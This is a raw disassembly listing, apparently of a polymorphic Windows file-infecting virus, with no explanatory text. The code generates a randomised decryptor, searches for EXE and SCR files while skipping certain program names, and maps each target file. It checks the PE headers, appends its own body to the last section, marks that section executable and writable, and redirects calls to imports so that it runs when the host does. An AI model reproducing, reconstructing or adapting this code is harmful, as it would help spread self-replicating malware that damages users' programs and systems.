loc_40B7BF: ; CODE XREF: sub_40B76A+5D�j
test dl, dl
jz short loc_40B7D0
shl eax, 1
dec dl
jmp short loc_40B7BF
; ---------------------------------------------------------------------------
jmp short loc_40B7D0
; ---------------------------------------------------------------------------
loc_40B7CB: ; CODE XREF: sub_40B76A+47�j
mov eax, 80000000h
loc_40B7D0: ; CODE XREF: sub_40B76A+57�j
; sub_40B76A+5F�j
stosd
loc_40B7D1: ; CODE XREF: sub_40B76A+3E�j
loop loc_40B792
retn
sub_40B76A endp
; ---------------------------------------------------------------------------
loc_40B7D4: ; CODE XREF: sub_40C22E+112�p
lea edi, dword_40343C[ebp]
test ss:dword_403431[ebp], 80000000h
jz short loc_40B7E9
mov al, 60h
stosb
loc_40B7E9: ; CODE XREF: seg002:0040B7E4�j
test ss:dword_403431[ebp], 1000003h
jz loc_40B8EF
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCA63ADh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test ss:dword_403431[ebp], 1000000h
mov ss:dword_40399A[ebp], edi
jz short loc_40B867
test ss:dword_403431[ebp], 2000000h
mov eax, 36FF6467h
jnz short loc_40B832
mov eax, 2E8B6467h
loc_40B832: ; CODE XREF: seg002:0040B82B�j
stosd
mov ax, 0
stosw
jz short loc_40B83E
mov al, 5Dh
stosb
loc_40B83E: ; CODE XREF: seg002:0040B839�j
test ss:dword_403431[ebp], 8000000h
mov eax, 86D8Dh
jnz short loc_40B865
test ss:dword_403431[ebp], 4000000h
mov eax, 8C583h
jz short loc_40B865
mov eax, 0F8ED83h
loc_40B865: ; CODE XREF: seg002:0040B84D�j
; seg002:0040B85E�j
stosd
dec edi
loc_40B867: ; CODE XREF: seg002:0040B81A�j
test ss:dword_403431[ebp], 3
jz short loc_40B877
mov al, 0E9h
stosb
stosd
loc_40B877: ; CODE XREF: seg002:0040B871�j
mov eax, ss:dword_403996[ebp]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test ss:dword_403431[ebp], 3
jz short loc_40B8EF
mov eax, 36FF6467h
mov ss:dword_40399E[ebp], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_40B76A
mov al, 20h
call sub_40B583
jecxz short loc_40B8EF
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, ss:dword_403431[ebp]
not edx
test edx, 3
jnz short loc_40B8E2
call sub_40B76A
mov al, 1Fh
call sub_40B583
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_40B8E2: ; CODE XREF: seg002:0040B8CC�j
mov ecx, edi
mov eax, ss:dword_40399E[ebp]
sub ecx, eax
mov [eax-4], ecx
loc_40B8EF: ; CODE XREF: seg002:0040B7F3�j
; seg002:0040B88E�j ...
test ss:dword_403431[ebp], 4
jz short loc_40B90D
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_40B90D: ; CODE XREF: seg002:0040B8F9�j
test ss:dword_403431[ebp], 8
jnz short loc_40B963
cmp ss:byte_40342F[ebp], 0
jz short loc_40B963
mov eax, 0C9291829h
or ah, ss:byte_40342B[ebp]
shl ah, 3
or ah, ss:byte_40342B[ebp]
stosd
mov al, 0B1h
stosb
mov al, ss:byte_40342F[ebp]
stosb
mov al, 40h
or al, ss:byte_40342B[ebp]
stosb
mov ax, 0FDE2h
test ss:dword_403431[ebp], 10h
jz short loc_40B961
mov al, 49h
stosb
mov ax, 0FC75h
loc_40B961: ; CODE XREF: seg002:0040B958�j
stosw
loc_40B963: ; CODE XREF: seg002:0040B917�j
; seg002:0040B920�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov ss:dword_403982[ebp], edi
test ss:dword_403431[ebp], 20h
jnz short loc_40B984
mov al, 58h
or al, ss:byte_403429[ebp]
stosb
loc_40B984: ; CODE XREF: seg002:0040B979�j
mov ax, 0C081h
test ss:dword_403431[ebp], 40h
jz short loc_40B997
add ah, 28h
loc_40B997: ; CODE XREF: seg002:0040B992�j
or ah, ss:byte_403429[ebp]
stosw
mov ss:dword_403986[ebp], edi
stosd
test ss:dword_403431[ebp], 40000000h
jnz short loc_40B9BB
mov al, 50h
add al, ss:byte_403429[ebp]
stosb
loc_40B9BB: ; CODE XREF: seg002:0040B9B0�j
test ss:dword_403431[ebp], 80h
jnz short loc_40B9D2
mov al, 0B8h
or al, ss:byte_40342A[ebp]
stosb
jmp short loc_40BA0F
; ---------------------------------------------------------------------------
loc_40B9D2: ; CODE XREF: seg002:0040B9C5�j
mov ax, 1831h
test ss:dword_403431[ebp], 100h
jz short loc_40B9E4
mov al, 29h
loc_40B9E4: ; CODE XREF: seg002:0040B9E0�j
or ah, ss:byte_40342A[ebp]
shl ah, 3
or ah, ss:byte_40342A[ebp]
stosw
mov ax, 0F081h
test ss:dword_403431[ebp], 200h
jnz short loc_40BA07
mov ah, 0C8h
loc_40BA07: ; CODE XREF: seg002:0040BA03�j
or ah, ss:byte_40342A[ebp]
stosw
loc_40BA0F: ; CODE XREF: seg002:0040B9D0�j
mov ss:dword_4039A2[ebp], edi
mov eax, 243Ch
stosd
test ss:dword_403431[ebp], 8
jz short loc_40BA93
test ss:dword_403431[ebp], 400h
jnz short loc_40BA3E
mov al, 0B8h
or al, ss:byte_40342B[ebp]
stosb
jmp short loc_40BA8B
; ---------------------------------------------------------------------------
loc_40BA3E: ; CODE XREF: seg002:0040BA31�j
test ss:dword_403431[ebp], 800h
jnz short loc_40BA5B
mov ax, 0E083h
or ah, ss:byte_40342B[ebp]
stosw
xor eax, eax
stosb
jmp short loc_40BA70
; ---------------------------------------------------------------------------
loc_40BA5B: ; CODE XREF: seg002:0040BA48�j
mov ax, 1829h
or ah, ss:byte_40342B[ebp]
shl ah, 3
or ah, ss:byte_40342B[ebp]
stosw
loc_40BA70: ; CODE XREF: seg002:0040BA59�j
test ss:dword_403431[ebp], 1000h
mov ax, 0C081h
jz short loc_40BA83
add ah, 8
loc_40BA83: ; CODE XREF: seg002:0040BA7E�j
or ah, ss:byte_40342B[ebp]
stosw
loc_40BA8B: ; CODE XREF: seg002:0040BA3C�j
movzx eax, ss:byte_40342F[ebp]
stosd
loc_40BA93: ; CODE XREF: seg002:0040BA25�j
test ss:dword_403431[ebp], 40000000h
jz short loc_40BAA8
mov al, 50h
add al, ss:byte_403429[ebp]
stosb
loc_40BAA8: ; CODE XREF: seg002:0040BA9D�j
test ss:dword_403431[ebp], 2000h
mov al, 86h
jnz short loc_40BAB8
add al, 4
loc_40BAB8: ; CODE XREF: seg002:0040BAB4�j
lea ecx, [edi-2]
mov ah, ss:byte_403429[ebp]
mov ss:dword_40398A[ebp], ecx
stosw
cmp ah, 5
jnz short loc_40BAD5
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40BAD5: ; CODE XREF: seg002:0040BACC�j
test ss:dword_403431[ebp], 4000h
mov ax, 3166h
jnz short loc_40BAE7
mov ah, 29h
loc_40BAE7: ; CODE XREF: seg002:0040BAE3�j
stosw
mov al, 18h
or al, ss:byte_40342B[ebp]
shl al, 3
stosb
mov al, 88h
test ss:dword_403431[ebp], 8000h
jnz short loc_40BB05
mov al, 86h
loc_40BB05: ; CODE XREF: seg002:0040BB01�j
mov ah, ss:byte_403429[ebp]
stosw
cmp ah, 5
jnz short loc_40BB19
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40BB19: ; CODE XREF: seg002:0040BB10�j
test ss:dword_403431[ebp], 10000h
jnz short loc_40BB30
mov al, 40h
or al, ss:byte_403429[ebp]
stosb
jmp short loc_40BB3F
; ---------------------------------------------------------------------------
loc_40BB30: ; CODE XREF: seg002:0040BB23�j
mov ax, 0C083h
or ah, ss:byte_403429[ebp]
stosw
mov al, 1
stosb
loc_40BB3F: ; CODE XREF: seg002:0040BB2E�j
test ss:dword_403431[ebp], 20000h
jnz short loc_40BB7A
test ss:dword_403431[ebp], 40000h
jnz short loc_40BB71
mov al, 0C0h
or al, ss:byte_40342B[ebp]
mov ah, ss:byte_403430[ebp]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_40BB79
; ---------------------------------------------------------------------------
loc_40BB71: ; CODE XREF: seg002:0040BB55�j
mov al, 40h
or al, ss:byte_40342B[ebp]
loc_40BB79: ; CODE XREF: seg002:0040BB6F�j
stosb
loc_40BB7A: ; CODE XREF: seg002:0040BB49�j
test ss:dword_403431[ebp], 80000h
jnz short loc_40BB96
mov ax, 0E883h
or ah, ss:byte_40342A[ebp]
stosw
mov al, 1
jmp short loc_40BB9E
; ---------------------------------------------------------------------------
loc_40BB96: ; CODE XREF: seg002:0040BB84�j
mov al, 48h
or al, ss:byte_40342A[ebp]
loc_40BB9E: ; CODE XREF: seg002:0040BB94�j
stosb
test ss:dword_403431[ebp], 100000h
mov cl, 75h
jnz short loc_40BBD2
mov ax, 0F883h
or ah, ss:byte_40342A[ebp]
stosw
xor eax, eax
stosb
sub ss:dword_40398A[ebp], edi
test ss:dword_403431[ebp], 200000h
jnz short loc_40BBED
mov cl, 77h
jmp short loc_40BBED
; ---------------------------------------------------------------------------
loc_40BBD2: ; CODE XREF: seg002:0040BBAB�j
mov ax, 1809h
or ah, ss:byte_40342A[ebp]
shl ah, 3
or ah, ss:byte_40342A[ebp]
stosw
sub ss:dword_40398A[ebp], edi
loc_40BBED: ; CODE XREF: seg002:0040BBCC�j
; seg002:0040BBD0�j
mov al, cl
mov ah, byte ptr ss:dword_40398A[ebp]
stosw
mov al, 58h
add al, ss:byte_403429[ebp]
stosb
test ss:dword_403431[ebp], 1000003h
jz loc_40BC97
mov eax, 268B6467h
mov ecx, ss:dword_403431[ebp]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_40BC2E
mov eax, 2E876467h
loc_40BC2E: ; CODE XREF: seg002:0040BC27�j
stosd
mov eax, 0
stosw
jnz short loc_40BC3E
mov ax, 0E58Bh
stosw
loc_40BC3E: ; CODE XREF: seg002:0040BC36�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test ss:dword_403431[ebp], 1000000h
jnz short loc_40BC94
test ss:dword_403431[ebp], 8000000h
jz short loc_40BC86
mov ax, 6C8Dh
test ss:dword_403431[ebp], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_40BC81
mov ax, 424h
stosw
jmp short loc_40BC94
; ---------------------------------------------------------------------------
loc_40BC81: ; CODE XREF: seg002:0040BC77�j
mov al, 8
stosb
jmp short loc_40BC94
; ---------------------------------------------------------------------------
loc_40BC86: ; CODE XREF: seg002:0040BC5E�j
mov ax, 5D58h
add al, ss:byte_40342B[ebp]
stosw
jmp short loc_40BC97
; ---------------------------------------------------------------------------
loc_40BC94: ; CODE XREF: seg002:0040BC52�j
; seg002:0040BC7F�j ...
mov al, 0C9h
stosb
loc_40BC97: ; CODE XREF: seg002:0040BC0A�j
; seg002:0040BC92�j
test ss:dword_403431[ebp], 80000000h
jz short loc_40BCC3
mov al, 7
sub al, ss:byte_403429[ebp]
shl eax, 1Ah
or eax, 240889h
add ah, ss:byte_403429[ebp]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_40BCC3: ; CODE XREF: seg002:0040BCA1�j
mov ax, 0E0FFh
or ah, ss:byte_403429[ebp]
stosw
test ss:dword_403431[ebp], 20h
jz short loc_40BD2E
test ss:dword_403431[ebp], 20000000h
jz short loc_40BCF4
loc_40BCE7: ; CODE XREF: seg002:0040BCF2�j
test edi, 3
jz short loc_40BCF4
mov al, 90h
stosb
jmp short loc_40BCE7
; ---------------------------------------------------------------------------
loc_40BCF4: ; CODE XREF: seg002:0040BCE5�j
; seg002:0040BCED�j
mov eax, edi
mov ecx, ss:dword_403982[ebp]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, ss:byte_403429[ebp]
stosb
test ss:dword_403431[ebp], 400000h
jz short loc_40BD22
mov ax, 0C350h
or al, ss:byte_403429[ebp]
jmp short loc_40BD2C
; ---------------------------------------------------------------------------
loc_40BD22: ; CODE XREF: seg002:0040BD14�j
mov ax, 0E0FFh
or ah, ss:byte_403429[ebp]
loc_40BD2C: ; CODE XREF: seg002:0040BD20�j
stosw
loc_40BD2E: ; CODE XREF: seg002:0040BCD9�j
test ss:dword_403431[ebp], 1000003h
jz short loc_40BDAD
test ss:dword_403431[ebp], 20000000h
jz short loc_40BD53
loc_40BD46: ; CODE XREF: seg002:0040BD51�j
test edi, 3
jz short loc_40BD53
mov al, 90h
stosb
jmp short loc_40BD46
; ---------------------------------------------------------------------------
loc_40BD53: ; CODE XREF: seg002:0040BD44�j
; seg002:0040BD4C�j
mov ecx, edi
mov eax, ss:dword_40399A[ebp]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test ss:dword_403431[ebp], 800000h
jnz short loc_40BD7C
lea eax, byte_403429[ebp]
loc_40BD74: ; CODE XREF: seg002:0040BD7A�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_40BD74
loc_40BD7C: ; CODE XREF: seg002:0040BD6C�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_40BD91
mov ax, 0C031h
stosw
loc_40BD91: ; CODE XREF: seg002:0040BD89�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_40BDAA
mov ax, 0C031h
stosw
loc_40BDAA: ; CODE XREF: seg002:0040BDA2�j
mov al, 0C3h
stosb
loc_40BDAD: ; CODE XREF: seg002:0040BD38�j
lea eax, dword_40343C[ebp]
test ss:dword_403431[ebp], 10000000h
jnz short loc_40BDC5
push edi
sub edi, eax
pop eax
jmp short loc_40BDDE
; ---------------------------------------------------------------------------
loc_40BDC5: ; CODE XREF: seg002:0040BDBD�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, ss:dword_4039A2[ebp]
add ss:dword_403982[ebp], edx
add [ecx], edi
mov eax, [esp+4]
loc_40BDDE: ; CODE XREF: seg002:0040BDC3�j
mov [ebp+40106Dh], edi
mov edi, ss:dword_403986[ebp]
sub eax, ss:dword_403982[ebp]
test ss:dword_403431[ebp], 40h
jz short loc_40BDFE
neg eax
loc_40BDFE: ; CODE XREF: seg002:0040BDFA�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_40BE02 proc near ; CODE XREF: sub_40C22E+2A8�p
push esi
push edi
cmp dword ptr ss:unk_4039AE[ebp], 0
jz loc_40BFEA
call near ptr loc_40BE22+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40BE22: ; CODE XREF: sub_40BE02+F�p
add bh, bh
sub_40BE02 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_40B53C
mov edx, ss:dword_4039A6[ebp]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_40B53C
mov edi, ss:dword_4039A6[ebp]
push esi
call sub_40B53C
mov edx, ss:dword_4039A6[ebp]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_40BFEA
jz loc_40BFEA
add esi, ss:dword_4039AA[ebp]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_40BFBB
loc_40BE9C: ; CODE XREF: sub_40BFBB+29�j
lodsb
cmp al, 0E8h
jnz loc_40BF47
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_40B53C
cmp ss:dword_4039A6[ebp], 0
jnz short loc_40BECA
cmp eax, [edi+0Ch]
jnb loc_40BFE3
jmp short loc_40BED6
; ---------------------------------------------------------------------------
loc_40BECA: ; CODE XREF: sub_40BFBB-FE�j
cmp ss:dword_4039A6[ebp], edx
jnz loc_40BFE3
loc_40BED6: ; CODE XREF: sub_40BFBB-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_40BFE3
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_40B53C
cmp ss:dword_4039A6[ebp], edi
jnz loc_40BFE3
add eax, ss:dword_4039AA[ebp]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_40BFE3
cmp eax, [edi+8]
jnb loc_40BFE3
loc_40BF1F: ; CODE XREF: sub_40BFBB+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push ss:dword_4039BE[ebp]
call ss:dword_403548[ebp]
pop edx
test eax, eax
jnz loc_40BFF9
jmp loc_40BFE3
; ---------------------------------------------------------------------------
loc_40BF47: ; CODE XREF: sub_40BFBB-11C�j
cmp al, 0FFh
jnz loc_40BFE3
cmp byte ptr [esi], 15h
jnz loc_40BFE3
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_40B53C
cmp ss:dword_4039A6[ebp], edi
jnz short loc_40BFE3
add eax, ss:dword_4039AA[ebp]
add eax, [ebp+403972h]
mov ss:dword_4039CA[ebp], eax
mov eax, [eax]
cmp eax, ss:dword_4039C2[ebp]
jb short loc_40BF90
cmp eax, ss:dword_4039C6[ebp]
jb short loc_40BFF9
loc_40BF90: ; CODE XREF: sub_40BFBB-35�j
cmp eax, 70000000h
jb short loc_40BFCE
call sub_40BFBB
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, ss:dword_4039CA[ebp]
jnz short locret_40BFBA
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_40BFD5
; ---------------------------------------------------------------------------
locret_40BFBA: ; CODE XREF: sub_40BFBB-F�j
retn
; END OF FUNCTION CHUNK FOR sub_40BFBB
; =============== S U B R O U T I N E =======================================
sub_40BFBB proc near ; CODE XREF: sub_40BFBB-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0040BE9C SIZE 0000011F BYTES
pop ss:dword_403992[ebp]
pusha
mov esi, [ebp+403972h]
call sub_40B643
popa
loc_40BFCE: ; CODE XREF: sub_40BFBB-26�j
test eax, 80000000h
jnz short loc_40BFE3
loc_40BFD5: ; CODE XREF: sub_40BFBB-3�j
sub eax, [edi+0Ch]
jb short loc_40BFE3
cmp eax, [edi+8]
jb loc_40BF1F
loc_40BFE3: ; CODE XREF: sub_40BFBB-F9�j
; sub_40BFBB-EB�j ...
dec ecx
jnz loc_40BE9C
loc_40BFEA: ; CODE XREF: sub_40BE02+9�j
; seg002:0040BE84�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_40C035
; ---------------------------------------------------------------------------
loc_40BFF9: ; CODE XREF: sub_40BFBB-7F�j
; sub_40BFBB-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, dword ptr ss:unk_4039AE[ebp]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_40C035: ; CODE XREF: sub_40BFBB+3C�j
pop edi
pop esi
retn
sub_40BFBB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C038 proc near ; CODE XREF: seg002:0040C206�p
; sub_40C22E+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_40C109
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_40C109
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call ss:dword_40355C[ebp]
cmp eax, 0FFFFFFFFh
jz loc_40C5C1
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_40C5B5
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_40C5B5
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_40C5B5
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_40C58D
mov [ebp+403972h], eax
locret_40C109: ; CODE XREF: sub_40C038+10�j
; sub_40C038+27�j ...
retn
sub_40C038 endp
; =============== S U B R O U T I N E =======================================
sub_40C10A proc near ; CODE XREF: sub_40C22E+117�p
; sub_40C22E+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test ss:dword_403431[ebp], 10000000h
jnz short loc_40C124
add eax, [ebp+40106Dh]
loc_40C124: ; CODE XREF: sub_40C10A+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_40C10A endp
; =============== S U B R O U T I N E =======================================
sub_40C14F proc near ; CODE XREF: sub_40C22E:loc_40C27D�p
; sub_40C22E+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_40C154: ; CODE XREF: sub_40C14F+23�j
jecxz short locret_40C18B
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_40C18B
cmp dword ptr [edx+0Ch], 1
jb short loc_40C154
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_40C18B: ; CODE XREF: sub_40C14F:loc_40C154�j
; sub_40C14F+1D�j ...
retn
sub_40C14F endp
; =============== S U B R O U T I N E =======================================
sub_40C18C proc near ; CODE XREF: seg002:0040C218�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_40C18C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40C199: ; CODE XREF: seg002:0040C1BA�j
mov ecx, edi
jmp short loc_40C1A8
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_40C1A4: ; CODE XREF: seg002:0040C1B6�j
mov ebx, edi
xor ecx, ecx
loc_40C1A8: ; CODE XREF: seg002:0040C19B�j
; seg002:0040C1BE�j
lodsb
cmp al, 61h
jb short loc_40C1B3
cmp al, 7Ah
ja short loc_40C1B3
sub al, 20h
loc_40C1B3: ; CODE XREF: seg002:0040C1AB�j
; seg002:0040C1AF�j
stosb
cmp al, 5Ch
jz short loc_40C1A4
cmp al, 2Eh
jz short loc_40C199
cmp al, 0
jnz short loc_40C1A8
jecxz short locret_40C18B
mov eax, [ecx]
cmp eax, 455845h
jz short loc_40C1D6
cmp eax, 524353h
jnz locret_40C109
loc_40C1D6: ; CODE XREF: seg002:0040C1C9�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_40C109
cmp eax, 4E554357h
jz locret_40C109
cmp eax, 32334357h
jz locret_40C109
cmp eax, 4F545350h
jz locret_40C109
xor ebx, ebx
call sub_40C038
jz locret_40C109
xor edx, edx
call sub_40C22E
call sub_40C18C
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_40C56B
; =============== S U B R O U T I N E =======================================
sub_40C22E proc near ; CODE XREF: seg002:0040C213�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_40C56B
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_40C56B
test dword ptr [ebx+16h], 2000h
jnz loc_40C56B
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_40C56B
jecxz short loc_40C27D
cmp ecx, 101h
jbe loc_40C56B
loc_40C27D: ; CODE XREF: sub_40C22E+41�j
call sub_40C14F
jb loc_40C56B
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_40AD87
xor ss:byte_40342F[ebp], dl
mov cl, 20h
xor ss:byte_403430[ebp], dh
loc_40C2A7: ; CODE XREF: sub_40C22E+92�j
push 20h
dec cl
pop eax
js short loc_40C2C2
call sub_40AD87
test edx, edx
setz dl
shl edx, cl
xor ss:dword_403431[ebp], edx
jmp short loc_40C2A7
; ---------------------------------------------------------------------------
loc_40C2C2: ; CODE XREF: sub_40C22E+7E�j
; sub_40C22E+CD�j ...
push 6
pop ecx
loc_40C2C8: ; CODE XREF: sub_40C22E+B8�j
push 6
pop eax
call sub_40AD87
mov al, ss:byte_403429[ebp]
xchg al, byte_403429[edx+ebp]
mov ss:byte_403429[ebp], al
loop loc_40C2C8
test ss:dword_403431[ebp], 8
jnz short loc_40C2FD
cmp ss:byte_40342B[ebp], 1
jz short loc_40C2C2
loc_40C2FD: ; CODE XREF: sub_40C22E+C4�j
test ss:dword_403431[ebp], 1000003h
jz short loc_40C324
cmp ss:byte_403429[ebp], 5
jz short loc_40C2C2
cmp ss:byte_40342A[ebp], 5
jz short loc_40C2C2
cmp ss:byte_40342B[ebp], 5
jz short loc_40C2C2
loc_40C324: ; CODE XREF: sub_40C22E+D9�j
test ss:dword_403431[ebp], 80000000h
jz short loc_40C339
cmp ss:byte_403429[ebp], 2
ja short loc_40C2C2
loc_40C339: ; CODE XREF: sub_40C22E+100�j
and dword ptr ss:unk_4039AE[ebp], 0
call loc_40B7D4
call sub_40C10A
call sub_40C574
mov ebx, [ebp+403976h]
call sub_40C038
jz loc_40C56B
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_40C14F
jb loc_40C56B
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test ss:dword_403431[ebp], 10000000h
jnz short loc_40C3A1
lea esi, dword_40343C[ebp]
mov ecx, [ebp+40106Dh]
rep movsb
loc_40C3A1: ; CODE XREF: sub_40C22E+163�j
push edi
mov ecx, 90Fh
lea esi, sub_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_40C3B5
rep movsb
loc_40C3B5: ; CODE XREF: sub_40C22E+183�j
test ss:dword_403431[ebp], 10000000h
jz loc_40C46D
push dword ptr [ebx+28h]
call sub_40B53C
mov edx, ss:dword_4039A6[ebp]
test edx, edx
jz loc_40C46D
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_40C3F2
xor ecx, ecx
loc_40C3F2: ; CODE XREF: sub_40C22E+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_40C459
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, ss:dword_403986[ebp]
test ss:dword_403431[ebp], 40h
jz short loc_40C432
neg dword ptr [eax]
loc_40C432: ; CODE XREF: sub_40C22E+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov dword ptr ss:unk_4039AE[ebp], esi
mov esi, [ebx+28h]
add [eax], esi
test ss:dword_403431[ebp], 40h
jz short loc_40C450
neg dword ptr [eax]
loc_40C450: ; CODE XREF: sub_40C22E+21E�j
push ecx
call sub_40C10A
pop ecx
jmp short loc_40C465
; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_40C22E+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_40C465: ; CODE XREF: sub_40C22E+229�j
lea esi, dword_40343C[ebp]
rep movsb
loc_40C46D: ; CODE XREF: sub_40C22E+191�j
; sub_40C22E+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, ss:byte_40342F[ebp]
jnz short loc_40C486
imul edx, 12345678h
loc_40C486: ; CODE XREF: sub_40C22E+250�j
mov [eax-1], dl
call sub_40A45A
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test ss:dword_403431[ebp], 10000000h
lea eax, [ecx+6]
jnz short loc_40C4B7
mov dword ptr ss:unk_4039AE[ebp], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_40C4B7: ; CODE XREF: sub_40C22E+274�j
sub eax, [ebx+28h]
push ss:dword_40397E[ebp]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test ss:dword_403431[ebp], 80000000h
jz short loc_40C4DC
push edx
call sub_40BE02
pop edx
loc_40C4DC: ; CODE XREF: sub_40C22E+2A5�j
mov ecx, dword ptr ss:unk_4039AE[ebp]
jecxz short loc_40C4E7
mov [ebx+28h], ecx
loc_40C4E7: ; CODE XREF: sub_40C22E+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_40C4F8
mov [edx+8], ecx
